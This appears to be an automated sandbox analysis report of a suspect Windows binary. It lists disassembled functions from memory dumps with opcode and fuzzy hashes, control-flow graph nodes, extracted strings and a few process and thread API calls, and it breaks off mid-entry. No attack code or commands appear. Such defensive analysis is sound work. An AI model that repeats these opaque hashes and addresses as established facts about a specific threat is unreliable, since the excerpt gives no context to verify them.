                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c47430f5411d30aa3bdd2894110aa424a30f15089d5069551e05a2808869322c
                                          • Instruction ID: ad9dce3e0ed79c6bb6aad403de868944fbdcf24887b35c1e47fecd3d01b08b6c
                                          • Opcode Fuzzy Hash: c47430f5411d30aa3bdd2894110aa424a30f15089d5069551e05a2808869322c
                                          • Instruction Fuzzy Hash: 5B52C3B4A042298FCB64DF28D984B9ABBF6FB48301F1091D9D90DA7355DB30AE85CF51
                                          Function 06CD7EB1 Relevance: .2, Instructions: 238COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c2600d5f85b8cc08b4dcf65f0583855665e06fff4cedcd344159192a4fd1036
                                          • Instruction ID: 05596d5cc8d6de8d9165a0ea94e05d706ac6ffc2ec10fad31feed951f4682c4e
                                          • Opcode Fuzzy Hash: 8c2600d5f85b8cc08b4dcf65f0583855665e06fff4cedcd344159192a4fd1036
                                          • Instruction Fuzzy Hash: F2A14770E45208CFDBA4DF69D844BEEBBF2BB49300F50906AD518A7354DB349985CF51
                                          Function 06CE7470 Relevance: .2, Instructions: 194COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90f93de85914ed921af0584740e3495cf940453b08d28ceb26033d6c96fbc513
                                          • Instruction ID: f05b953581fe0481f4dc84a90f96ff8d888b420c74dedbb1c7ab7b664d95a202
                                          • Opcode Fuzzy Hash: 90f93de85914ed921af0584740e3495cf940453b08d28ceb26033d6c96fbc513
                                          • Instruction Fuzzy Hash: C2811B74E01209DFDB44DF99D580AAEBBF6FF88300F10842AE419AB355DB34A945CF51
                                          Function 06CE7480 Relevance: .2, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 376a6d87999af6620e6cc1bfcdad9496a4015e8fc9dbaecaff0cf10c91b1640d
                                          • Instruction ID: b9463a38bdf1e24a5b946190d415871b666ef7666c449e532677be7b16f6d652
                                          • Opcode Fuzzy Hash: 376a6d87999af6620e6cc1bfcdad9496a4015e8fc9dbaecaff0cf10c91b1640d
                                          • Instruction Fuzzy Hash: 2F810974E01209DFDB44DF99D580AAEBBF6FF88300F10842AE519AB354DB34A945CF91
                                          Function 069505D0 Relevance: .1, Instructions: 121COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60dd154347efd7a89f8b98926bc35e05a127eb497caa1c7ef38c42cd2513b1d7
                                          • Instruction ID: 9662dd08e02328f7a3d7b684a46e122c04d44ecb9bfa8ac7e36556bad26eeb65
                                          • Opcode Fuzzy Hash: 60dd154347efd7a89f8b98926bc35e05a127eb497caa1c7ef38c42cd2513b1d7
                                          • Instruction Fuzzy Hash: C9512E75D056289BEB6CCF2B8D556DAFAF7AFC9300F14C0F9990CA6654EB704A818F40
                                          Function 00DAD0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1160 dad0b8-dad147 GetCurrentProcess 1164 dad149-dad14f 1160->1164 1165 dad150-dad184 GetCurrentThread 1160->1165 1164->1165 1166 dad18d-dad1c1 GetCurrentProcess 1165->1166 1167 dad186-dad18c 1165->1167 1169 dad1ca-dad1e2 1166->1169 1170 dad1c3-dad1c9 1166->1170 1167->1166 1172 dad1eb-dad21a GetCurrentThreadId 1169->1172 1170->1169 1174 dad21c-dad222 1172->1174 1175 dad223-dad285 1172->1175 1174->1175
                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00DAD136
                                          • GetCurrentThread.KERNEL32 ref: 00DAD173
                                          • GetCurrentProcess.KERNEL32 ref: 00DAD1B0
                                          • GetCurrentThreadId.KERNEL32 ref: 00DAD209
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 098bbc357607302eca86f83c27b41d7190ad999272f6b0abacb390b8cc24dd38
                                          • Instruction ID: 244b06983497bd25e9bffe4e81f206a555e49b11f0400b27d5871279545d72e5
                                          • Opcode Fuzzy Hash: 098bbc357607302eca86f83c27b41d7190ad999272f6b0abacb390b8cc24dd38
                                          • Instruction Fuzzy Hash: 655146B0900709CFDB14DFA9D588B9EBBF2EF49314F208459E419A7350DB789944CF66
                                          Function 06B54688 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1444 6b54688-6b546b0 1446 6b546b2-6b546f9 1444->1446 1447 6b546fe-6b5470c 1444->1447 1496 6b54b55-6b54b5c 1446->1496 1448 6b5470e-6b54719 call 6b521b0 1447->1448 1449 6b5471b 1447->1449 1451 6b5471d-6b54724 1448->1451 1449->1451 1454 6b5480d-6b54811 1451->1454 1455 6b5472a-6b5472e 1451->1455 1459 6b54867-6b54871 1454->1459 1460 6b54813-6b54822 call 6b503d8 1454->1460 1456 6b54734-6b54738 1455->1456 1457 6b54b5d-6b54b85 1455->1457 1461 6b5474a-6b547a8 call 6b51ef0 call 6b52958 1456->1461 1462 6b5473a-6b54744 1456->1462 1467 6b54b8c-6b54bb6 1457->1467 1463 6b54873-6b54882 1459->1463 1464 6b548aa-6b548d0 1459->1464 1471 6b54826-6b5482b 1460->1471 1503 6b547ae-6b54808 1461->1503 1504 6b54c1b-6b54c45 1461->1504 1462->1461 1462->1467 1480 6b54bbe-6b54bd4 1463->1480 1481 6b54888-6b548a5 1463->1481 1486 6b548d2-6b548db 1464->1486 1487 6b548dd 1464->1487 1467->1480 1475 6b54824 1471->1475 1476 6b5482d-6b54862 call 6b54558 1471->1476 1475->1471 1476->1496 1506 6b54bdc-6b54c14 1480->1506 1481->1496 1494 6b548df-6b54907 1486->1494 1487->1494 1511 6b5490d-6b54926 1494->1511 1512 6b549d8-6b549dc 1494->1512 1503->1496 1513 6b54c47-6b54c4d 1504->1513 1514 6b54c4f-6b54c55 1504->1514 1506->1504 1511->1512 1534 6b5492c-6b5493b 1511->1534 1515 6b54a56-6b54a60 1512->1515 1516 6b549de-6b549f7 1512->1516 1513->1514 1521 6b54c56-6b54c93 1513->1521 1517 6b54a62-6b54a6c 1515->1517 1518 6b54abd-6b54ac6 1515->1518 1516->1515 1539 6b549f9-6b54a08 1516->1539 1532 6b54a72-6b54a84 1517->1532 1533 6b54a6e-6b54a70 1517->1533 1523 6b54afe-6b54b4b 1518->1523 1524 6b54ac8-6b54af6 call 6b51700 call 6b51720 1518->1524 1543 6b54b53 1523->1543 1524->1523 1540 6b54a86-6b54a88 1532->1540 1533->1540 1550 6b54953-6b54968 1534->1550 1551 6b5493d-6b54943 1534->1551 1557 6b54a20-6b54a2b 1539->1557 1558 6b54a0a-6b54a10 1539->1558 1547 6b54ab6-6b54abb 1540->1547 1548 6b54a8a-6b54a8e 1540->1548 1543->1496 1547->1517 1547->1518 1553 6b54a90-6b54aa9 1548->1553 1554 6b54aac-6b54aaf 1548->1554 1563 6b5499c-6b549a5 1550->1563 1564 6b5496a-6b54996 call 6b50850 1550->1564 1559 6b54945 1551->1559 1560 6b54947-6b54949 1551->1560 1553->1554 1554->1547 1557->1504 1568 6b54a31-6b54a54 1557->1568 1566 6b54a14-6b54a16 1558->1566 1567 6b54a12 1558->1567 1559->1550 1560->1550 1563->1504 1565 6b549ab-6b549d2 1563->1565 1564->1506 1564->1563 1565->1512 1565->1534 1566->1557 1567->1557 1568->1515 1568->1539
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Haq$Haq$Haq
                                          • API String ID: 0-3013282719
                                          • Opcode ID: c49310c0a57c85255db3d19a1ea4daf215dd7ed70f744c5d3361506171f868e9
                                          • Instruction ID: 24d3150a89dabacf9672ae7fa4ea039b500f10b07beb09b160b9f1fc1b8cad45
                                          • Opcode Fuzzy Hash: c49310c0a57c85255db3d19a1ea4daf215dd7ed70f744c5d3361506171f868e9
                                          • Instruction Fuzzy Hash: 5B126BB1A002048FCBA4DFA9D484BAEB7F2FF88300F1584ADD9169B355DB31A945CB91
                                          Function 06B564C8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1582 6b564c8-6b56505 1584 6b56527-6b5653d call 6b562d0 1582->1584 1585 6b56507-6b5650a 1582->1585 1591 6b568b3-6b568c7 1584->1591 1592 6b56543-6b5654f 1584->1592 1700 6b5650c call 6b56de0 1585->1700 1701 6b5650c call 6b56e38 1585->1701 1587 6b56512-6b56514 1587->1584 1589 6b56516-6b5651e 1587->1589 1589->1584 1603 6b56907-6b56910 1591->1603 1593 6b56555-6b56558 1592->1593 1594 6b56680-6b56687 1592->1594 1597 6b5655b-6b56564 1593->1597 1595 6b567b6-6b567f0 call 6b55cd8 1594->1595 1596 6b5668d-6b56696 1594->1596 1696 6b567f3 call 6b58c70 1595->1696 1697 6b567f3 call 6b58c60 1595->1697 1596->1595 1599 6b5669c-6b567a8 call 6b55cd8 call 6b56268 call 6b55cd8 1596->1599 1601 6b569a8 1597->1601 1602 6b5656a-6b5657e 1597->1602 1693 6b567b3-6b567b4 1599->1693 1694 6b567aa 1599->1694 1610 6b569ad-6b569b1 1601->1610 1619 6b56584-6b56619 call 6b562d0 * 2 call 6b55cd8 call 6b56268 call 6b56310 call 6b563b8 call 6b56420 1602->1619 1620 6b56670-6b5667a 1602->1620 1604 6b568d5-6b568de 1603->1604 1605 6b56912-6b56919 1603->1605 1604->1601 1612 6b568e4-6b568f6 1604->1612 1608 6b56967-6b5696e 1605->1608 1609 6b5691b-6b5695e call 6b55cd8 1605->1609 1613 6b56970-6b56980 1608->1613 1614 6b56993-6b569a6 1608->1614 1609->1608 1617 6b569b3 1610->1617 1618 6b569bc 1610->1618 1627 6b56906 1612->1627 1628 6b568f8-6b568fd 1612->1628 1613->1614 1632 6b56982-6b5698a 1613->1632 1614->1610 1617->1618 1626 6b569bd 1618->1626 1672 6b56638-6b5666b call 6b56420 1619->1672 1673 6b5661b-6b56633 call 6b563b8 call 6b55cd8 call 6b55f88 1619->1673 1620->1594 1620->1597 1626->1626 1627->1603 1698 6b56900 call 6b59401 1628->1698 1699 6b56900 call 6b59410 1628->1699 1632->1614 1640 6b567f9-6b568aa call 6b55cd8 1640->1591 1672->1620 1673->1672 1693->1595 1694->1693 1696->1640 1697->1640 1698->1627 1699->1627 1700->1587 1701->1587
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q
                                          • API String ID: 0-705557208
                                          • Opcode ID: 84685ed1a51cf0e36a7443fc3e365aa02094c5ef1f07f0c0bc13eeb50ba2cf01
                                          • Instruction ID: 335f381eb5821c7561bb114f6bc6b1d23030436b472e29a4c61807a10a6c41bf
                                          • Opcode Fuzzy Hash: 84685ed1a51cf0e36a7443fc3e365aa02094c5ef1f07f0c0bc13eeb50ba2cf01
                                          • Instruction Fuzzy Hash: 91F1D974A10218CFCB44EFA4D994A9DB7B2FF89300F518198E906AB3B5DB71EC42CB51
                                          Function 06B5AAA0 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1702 6b5aaa0-6b5aab0 1703 6b5aab6-6b5aaba 1702->1703 1704 6b5abc9-6b5abee 1702->1704 1705 6b5abf5-6b5ac1a 1703->1705 1706 6b5aac0-6b5aac9 1703->1706 1704->1705 1707 6b5ac21 1705->1707 1706->1707 1708 6b5aacf-6b5aaf6 1706->1708 1712 6b5ac2b-6b5ac57 1707->1712 1718 6b5aafc-6b5aafe 1708->1718 1719 6b5abbe-6b5abc8 1708->1719 1724 6b5ac5e-6b5ac75 1712->1724 1722 6b5ab00-6b5ab03 1718->1722 1723 6b5ab1f-6b5ab21 1718->1723 1722->1724 1725 6b5ab09-6b5ab13 1722->1725 1726 6b5ab24-6b5ab28 1723->1726 1724->1712 1733 6b5ac77-6b5acb4 1724->1733 1725->1724 1728 6b5ab19-6b5ab1d 1725->1728 1729 6b5ab89-6b5ab95 1726->1729 1730 6b5ab2a-6b5ab39 1726->1730 1728->1723 1728->1726 1729->1724 1731 6b5ab9b-6b5abb8 1729->1731 1730->1724 1736 6b5ab3f-6b5ab86 1730->1736 1731->1718 1731->1719 1741 6b5acb6-6b5acca 1733->1741 1742 6b5acd8-6b5acef 1733->1742 1736->1729 1817 6b5accd call 6b5b319 1741->1817 1818 6b5accd call 6b5b1b8 1741->1818 1751 6b5acf5-6b5addb call 6b562d0 call 6b55cd8 * 2 call 6b56310 call 6b59ad8 call 6b55cd8 call 6b58c70 call 6b56b78 1742->1751 1752 6b5ade0-6b5adf0 1742->1752 1747 6b5acd3 1750 6b5af03-6b5af0e 1747->1750 1759 6b5af10-6b5af20 1750->1759 1760 6b5af3d-6b5af5e call 6b56420 1750->1760 1751->1752 1761 6b5adf6-6b5aed0 call 6b562d0 * 2 call 6b56a88 call 6b55cd8 * 2 call 6b55f88 call 6b56420 call 6b55cd8 1752->1761 1762 6b5aede-6b5aefa call 6b55cd8 1752->1762 1771 6b5af30-6b5af38 call 6b56b78 1759->1771 1772 6b5af22-6b5af28 1759->1772 1814 6b5aed2 1761->1814 1815 6b5aedb 1761->1815 1762->1750 1771->1760 1772->1771 1814->1815 1815->1762 1817->1747 1818->1747
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$(aq$Haq
                                          • API String ID: 0-2456560092
                                          • Opcode ID: 76ed5044ae67ed69c81de009570ea62c87ca91c90ed01536dbfe24d6a0561472
                                          • Instruction ID: 36e27432eef53793df5d442459675c57f21017de40ab9512c1b8c6b1aaeca112
                                          • Opcode Fuzzy Hash: 76ed5044ae67ed69c81de009570ea62c87ca91c90ed01536dbfe24d6a0561472
                                          • Instruction Fuzzy Hash: C0E15974A00209DFCB54EF64D494AADBBB2FF89300F1185A9E906AB365DF30ED45CB91
                                          Function 069A1EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: b5f1621f7d2a222c5a81ea7fb58e8ac8c3b50055076bc92dc481af5013a89e86
                                          • Instruction ID: 1f32c49a6fac0485c1d0c6ab1fea5d58dae6e7d9c75bf074d3e24d751f8c66b4
                                          • Opcode Fuzzy Hash: b5f1621f7d2a222c5a81ea7fb58e8ac8c3b50055076bc92dc481af5013a89e86
                                          • Instruction Fuzzy Hash: 7A420174E04219CFDB54CFA8D558AAEBBF6FF48300F248429D912AB654DB346E46CF90
                                          Function 069A29D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2511 69a29d0-69a29f8 2512 69a29fa 2511->2512 2513 69a29ff-69a2a28 2511->2513 2512->2513 2514 69a2a2a-69a2a33 2513->2514 2515 69a2a49 2513->2515 2517 69a2a3a-69a2a3d 2514->2517 2518 69a2a35-69a2a38 2514->2518 2516 69a2a4c-69a2a50 2515->2516 2520 69a2e07-69a2e1e 2516->2520 2519 69a2a47 2517->2519 2518->2519 2519->2516 2522 69a2e24-69a2e28 2520->2522 2523 69a2a55-69a2a59 2520->2523 2524 69a2e2a-69a2e5a 2522->2524 2525 69a2e5d-69a2e61 2522->2525 2526 69a2a5b-69a2ab8 2523->2526 2527 69a2a5e-69a2a62 2523->2527 2524->2525 2531 69a2e82 2525->2531 2532 69a2e63-69a2e6c 2525->2532 2533 69a2aba-69a2b2b 2526->2533 2534 69a2abd-69a2ac1 2526->2534 2529 69a2a8b-69a2aaf 2527->2529 2530 69a2a64-69a2a88 2527->2530 2529->2520 2530->2529 2535 69a2e85-69a2e8b 2531->2535 2537 69a2e6e-69a2e71 2532->2537 2538 69a2e73-69a2e76 2532->2538 2545 69a2b2d-69a2b8a 2533->2545 2546 69a2b30-69a2b34 2533->2546 2542 69a2aea-69a2b11 2534->2542 2543 69a2ac3-69a2ae7 2534->2543 2539 69a2e80 2537->2539 2538->2539 2539->2535 2566 69a2b13-69a2b19 2542->2566 2567 69a2b21-69a2b22 2542->2567 2543->2542 2555 69a2b8f-69a2b93 2545->2555 2556 69a2b8c-69a2be8 2545->2556 2551 69a2b5d-69a2b81 2546->2551 2552 69a2b36-69a2b5a 2546->2552 2551->2520 2552->2551 2561 69a2bbc-69a2bbf 2555->2561 2562 69a2b95-69a2bb9 2555->2562 2568 69a2bea-69a2c4c 2556->2568 2569 69a2bed-69a2bf1 2556->2569 2570 69a2bc7-69a2bdf 2561->2570 2562->2561 2566->2567 2567->2520 2578 69a2c4e-69a2cb0 2568->2578 2579 69a2c51-69a2c55 2568->2579 2573 69a2c1a-69a2c32 2569->2573 2574 69a2bf3-69a2c17 2569->2574 2570->2520 2588 69a2c42-69a2c43 2573->2588 2589 69a2c34-69a2c3a 2573->2589 2574->2573 2590 69a2cb2-69a2d14 2578->2590 2591 69a2cb5-69a2cb9 2578->2591 2583 69a2c7e-69a2c96 2579->2583 2584 69a2c57-69a2c7b 2579->2584 2599 69a2c98-69a2c9e 2583->2599 2600 69a2ca6-69a2ca7 2583->2600 2584->2583 2588->2520 2589->2588 2601 69a2d19-69a2d1d 2590->2601 2602 69a2d16-69a2d78 2590->2602 2594 69a2cbb-69a2cdf 2591->2594 2595 69a2ce2-69a2cfa 2591->2595 2594->2595 2610 69a2d0a-69a2d0b 2595->2610 2611 69a2cfc-69a2d02 2595->2611 2599->2600 2600->2520 2605 69a2d1f-69a2d43 2601->2605 2606 69a2d46-69a2d5e 2601->2606 2612 69a2d7a-69a2dd3 2602->2612 2613 69a2d7d-69a2d81 2602->2613 2605->2606 2621 69a2d6e-69a2d6f 2606->2621 2622 69a2d60-69a2d66 2606->2622 2610->2520 2611->2610 2623 69a2dfc-69a2dff 2612->2623 2624 69a2dd5-69a2df9 2612->2624 2616 69a2daa-69a2dcd 2613->2616 2617 69a2d83-69a2da7 2613->2617 2616->2520 2617->2616 2621->2520 2622->2621 2623->2520 2624->2623
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: 437cafc8a6439ec15ade1a4bf43b2280c9762025eee55df22d153ebc16b52155
                                          • Instruction ID: 4a454ffed4fe2a8b4c976424abd0a44d0f3e7fbec5d8e9b7b3c567519efa345a
                                          • Opcode Fuzzy Hash: 437cafc8a6439ec15ade1a4bf43b2280c9762025eee55df22d153ebc16b52155
                                          • Instruction Fuzzy Hash: 85F1E574D01218DFCBA4DFA4E4886EDBBB6FF49311F24852AE416A7350CB316A85CF81
                                          Function 06B54140 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2636 6b54140-6b54152 2637 6b54154-6b54175 2636->2637 2638 6b5417c-6b54180 2636->2638 2637->2638 2639 6b54182-6b54184 2638->2639 2640 6b5418c-6b5419b 2638->2640 2639->2640 2641 6b541a7-6b541d3 2640->2641 2642 6b5419d 2640->2642 2646 6b54400-6b54447 2641->2646 2647 6b541d9-6b541df 2641->2647 2642->2641 2676 6b5445d-6b54469 2646->2676 2677 6b54449 2646->2677 2649 6b541e5-6b541eb 2647->2649 2650 6b542b1-6b542b5 2647->2650 2649->2646 2654 6b541f1-6b541fe 2649->2654 2651 6b542b7-6b542c0 2650->2651 2652 6b542d8-6b542e1 2650->2652 2651->2646 2655 6b542c6-6b542d6 2651->2655 2656 6b54306-6b54309 2652->2656 2657 6b542e3-6b54303 2652->2657 2658 6b54204-6b5420d 2654->2658 2659 6b54290-6b54299 2654->2659 2662 6b5430c-6b54312 2655->2662 2656->2662 2657->2656 2658->2646 2660 6b54213-6b5422b 2658->2660 2659->2646 2661 6b5429f-6b542ab 2659->2661 2665 6b54237-6b54249 2660->2665 2666 6b5422d 2660->2666 2661->2649 2661->2650 2662->2646 2664 6b54318-6b5432b 2662->2664 2664->2646 2668 6b54331-6b54341 2664->2668 2665->2659 2675 6b5424b-6b54251 2665->2675 2666->2665 2668->2646 2670 6b54347-6b54354 2668->2670 2670->2646 2674 6b5435a-6b5436f 2670->2674 2674->2646 2687 6b54375-6b54398 2674->2687 2678 6b54253 2675->2678 2679 6b5425d-6b54263 2675->2679 2682 6b54475-6b54491 2676->2682 2683 6b5446b 2676->2683 2680 6b5444c-6b5444e 2677->2680 2678->2679 2679->2646 2684 6b54269-6b5428d 2679->2684 2685 6b54450-6b5445b 2680->2685 2686 6b54492-6b54498 2680->2686 2683->2682 2685->2676 2685->2680 2692 6b544bc-6b544bf 2686->2692 2693 6b5449a-6b544b6 2686->2693 2687->2646 2694 6b5439a-6b543a5 2687->2694 2696 6b544d7-6b544d9 2692->2696 2697 6b544c1-6b544c7 2692->2697 2693->2692 2698 6b543a7-6b543b1 2694->2698 2699 6b543f6-6b543fd 2694->2699 2722 6b544db call 6b552f0 2696->2722 2723 6b544db call 6b55360 2696->2723 2724 6b544db call 6b54558 2696->2724 2700 6b544c9 2697->2700 2701 6b544cb-6b544cd 2697->2701 2698->2699 2706 6b543b3-6b543c9 2698->2706 2700->2696 2701->2696 2702 6b544e1-6b544e5 2704 6b544e7-6b544fe 2702->2704 2705 6b54530-6b54540 2702->2705 2704->2705 2714 6b54500-6b5450a 2704->2714 2710 6b543d5-6b543ee 2706->2710 2711 6b543cb 2706->2711 2710->2699 2711->2710 2717 6b5451d-6b5452d 2714->2717 2718 6b5450c-6b5451b 2714->2718 2718->2717 2722->2702 2723->2702 2724->2702
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$d
                                          • API String ID: 0-3557608343
                                          • Opcode ID: a6872a532c57e697160e8bcab0d2cbec66e01f2e2a88d2308ea72d841414f1d1
                                          • Instruction ID: 7b4fcbdd90d40a0f44d83bac568002bbedd29fa8cb4da6837144a24f10ec0d1f
                                          • Opcode Fuzzy Hash: a6872a532c57e697160e8bcab0d2cbec66e01f2e2a88d2308ea72d841414f1d1
                                          • Instruction Fuzzy Hash: 59D19075600601CFCB15CF68D480AAAB7F2FF88314B16C5A9D85A8B365DB30FC96CB90
                                          Function 069A26A8 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2725 69a26a8-69a26cd 2726 69a26cf 2725->2726 2727 69a26d4-69a26f1 2725->2727 2726->2727 2728 69a2712 2727->2728 2729 69a26f3-69a26fc 2727->2729 2730 69a2715-69a2719 2728->2730 2731 69a26fe-69a2701 2729->2731 2732 69a2703-69a2706 2729->2732 2734 69a2934-69a294b 2730->2734 2733 69a2710 2731->2733 2732->2733 2733->2730 2736 69a271e-69a2722 2734->2736 2737 69a2951-69a2955 2734->2737 2740 69a272a-69a272e 2736->2740 2741 69a2724-69a27c2 2736->2741 2738 69a297f-69a2983 2737->2738 2739 69a2957-69a297c 2737->2739 2742 69a29a4 2738->2742 2743 69a2985-69a298e 2738->2743 2739->2738 2745 69a2758-69a277d 2740->2745 2746 69a2730-69a273d 2740->2746 2749 69a27ca-69a27ce 2741->2749 2750 69a27c4-69a2862 2741->2750 2747 69a29a7-69a29ad 2742->2747 2751 69a2990-69a2993 2743->2751 2752 69a2995-69a2998 2743->2752 2772 69a279e 2745->2772 2773 69a277f-69a2788 2745->2773 2766 69a2746-69a2755 2746->2766 2756 69a27f8-69a281d 2749->2756 2757 69a27d0-69a27f5 2749->2757 2760 69a286a-69a286e 2750->2760 2761 69a2864-69a28ff 2750->2761 2753 69a29a2 2751->2753 2752->2753 2753->2747 2784 69a283e 2756->2784 2785 69a281f-69a2828 2756->2785 2757->2756 2764 69a2898-69a28bd 2760->2764 2765 69a2870-69a2895 2760->2765 2769 69a2929-69a292c 2761->2769 2770 69a2901-69a2926 2761->2770 2798 69a28de 2764->2798 2799 69a28bf-69a28c8 2764->2799 2765->2764 2766->2745 2769->2734 2770->2769 2774 69a27a1-69a27a8 2772->2774 2780 69a278a-69a278d 2773->2780 2781 69a278f-69a2792 2773->2781 2782 69a27aa-69a27b0 2774->2782 2783 69a27b8-69a27b9 2774->2783 2787 69a279c 2780->2787 2781->2787 2782->2783 2783->2734 2791 69a2841-69a2848 2784->2791 2788 69a282a-69a282d 2785->2788 2789 69a282f-69a2832 2785->2789 2787->2774 2794 69a283c 2788->2794 2789->2794 2795 69a284a-69a2850 2791->2795 2796 69a2858-69a2859 2791->2796 2794->2791 2795->2796 2796->2734 2800 69a28e1-69a28e8 2798->2800 2802 69a28ca-69a28cd 2799->2802 2803 69a28cf-69a28d2 2799->2803 2804 69a28ea-69a28f0 2800->2804 2805 69a28f8-69a28f9 2800->2805 2807 69a28dc 2802->2807 2803->2807 2804->2805 2805->2734 2807->2800
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: d9896e393c42c20082efe319e8cf5478a22d7def589cee76cc6f11aa251d7c1a
                                          • Instruction ID: 5b34f8477b2ae71887d1b55f617e5449ea8b21175e24cee5bb65602c914f3f0d
                                          • Opcode Fuzzy Hash: d9896e393c42c20082efe319e8cf5478a22d7def589cee76cc6f11aa251d7c1a
                                          • Instruction Fuzzy Hash: FCA1E674E01219CFDB58DFA8D5486ADBBF6FF88301F258429E81267750CB346A86CF91
                                          Function 06B52771 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
